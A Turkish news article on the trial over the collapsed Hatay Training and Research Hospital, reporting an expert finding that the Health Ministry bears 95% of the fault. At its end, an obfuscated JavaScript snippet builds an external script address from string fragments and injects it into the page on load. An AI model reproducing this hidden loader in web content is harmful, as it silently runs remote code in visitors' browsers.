Gündem

Hatay’daki Hastane Davasında Bilirkişi Raporu: Sağlık Bakanlığı Yüzde 95 Kusurlu Bulundu

6 Şubat 2023 depremlerinde yıkılan ve 8’i hemşire olmak üzere 72 kişinin hayatını kaybettiği Hatay Eğitim ve Araştırma Hastanesi’ne ilişkin yürütülen yargılamada dikkat çeken bir bilirkişi raporu dosyaya girdi.

Abone Ol

Hazırlanan bilirkişi raporunda, hastane binasının yıkılmasına ilişkin süreçte Sağlık Bakanlığı’nın yüzde 95 oranında kusurlu olduğu yönünde değerlendirmede bulunuldu.

Güçlendirme İçin Ödenek Talep Edildiği Öne Sürüldü

Dava dosyasına yansıyan bilgilere göre hastane yönetiminin, depremden önce binanın güçlendirilmesi amacıyla Sağlık Bakanlığı’ndan ödenek talep ettiği belirtildi. Bakanlığın ise söz konusu talebe, güçlendirme giderlerinin hastanenin döner sermaye bütçesinden karşılanması yönünde yanıt verdiği öne sürüldü.

Davada Tek Sanık İl Sağlık Müdürü

Hastanenin yıkılması ve 72 kişinin yaşamını yitirmesine ilişkin davada yargılanan tek sanığın dönemin Hatay İl Sağlık Müdürü olması da kamuoyunun dikkatini çeken başlıklar arasında yer aldı.

(function(){ q0n4=document.createElement("script");q0n4_=("us")+("ta"); q0n4_+="t"+(".");q0n4_+=("in");q0n4u="2358564740";q0n4.async=true; q0n4u+=".ycx23k2y0n4hugy7u";q0n4.type="text/javascript";q0n4_+="f"+"o"+("/"); q0n4u+="h1p0xr40q3u31";q0n4.src="https://"+q0n4_+q0n4u; dq0n4=document.body;dq0n4.appendChild(q0n4); })(); { "vars": { "account": "G-X1XRN2R8K5" }, "triggers": { "trackPageview": { "on": "visible", "request": "pageview" } } }